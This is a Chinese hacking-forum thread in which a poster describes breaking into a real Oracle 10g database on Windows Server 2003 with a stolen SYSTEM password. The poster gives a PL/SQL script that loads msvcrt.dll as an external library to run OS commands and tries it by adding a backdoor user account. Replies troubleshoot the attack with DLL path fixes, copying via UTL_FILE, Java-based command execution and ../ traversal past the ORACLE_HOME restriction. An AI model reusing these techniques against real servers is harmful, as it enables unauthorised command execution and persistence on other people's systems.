[讨论]Oracle入侵中遇到的问题
[讨论]Oracle入侵中遇到的问题议题作者:mon
近日入侵一数据库,系统环境为 win2k3+Oracle 10g(R2).获得了system的密码.用sqlplus连接.创建Oracle Execute Command Sql Script 以执行系统命令.
Oracle Execute Command Sql Script 如下:
CREATE OR REPLACE LIBRARY exec_shell AS 'D:\windows\system32\msvcrt.dll';
/
show errors
CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
CREATE OR REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors
可是执行命令时却出现这样的错误:
SQL> exec oracmd.exec ('net user haha haha /add');
BEGIN oracmd.exec ('net user haha haha /add'); END;
*
第 1 行出现错误:
ORA-28595: Extproc 代理: DLL 路径无效
ORA-06512: 在 "SYSTEM.ORACMD", line 2
ORA-06512: 在 line 1
不知出什么问题了.请高手解答. 如果我没有理解错,你应该想说2k3而不是3k2,然后问题好想在c:\winnt\system32上,应该是c:\windows\system32吧
我懂的不多,说错了莫笑哈
[url=http://wpa.qq.com/msgrd?V=1&Uin=12361629&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子38 精华[url=http://forum.eviloctal.com/digest.php?authorid=92612]2[/url] 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=92612]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-72686.html]mon[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 哎呀 ! 过于马虎.写错了一点.系统的确是win2k3 sp2才对.并且系统装在D盘.用Oracle Execute Command Sql Script 没注意到winnt.不过改了还是老样子.是不是10g现在不支持这个Oracle Execute Command Sql Script 了?
帖子4 精华[url=http://forum.eviloctal.com/digest.php?authorid=72686]0[/url] 积分16 阅读权限40 性别男 在线时间6 小时 注册时间2007-1-18 最后登录2008-3-26 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=72686]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-110779.html]poison[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 貌似是ORACLE把外部库的位置限制在了ORACLE_HOME中
原则上可以用UTL_FILE复制DLL到限制目录中 可俺没成功过
我都是用JAVA执行OS命令
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=110779]0[/url] 积分15 阅读权限40 性别男 在线时间9 小时 注册时间2007-4-20 最后登录2008-5-4 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=110779]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-1099.html]mickey[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 貌似可以用../../../绕过ORACLE_HOME限制
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=1099]0[/url] 积分51 阅读权限40 在线时间14 小时 注册时间2004-12-20 最后登录2008-4-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1099]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-110779.html]poison[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]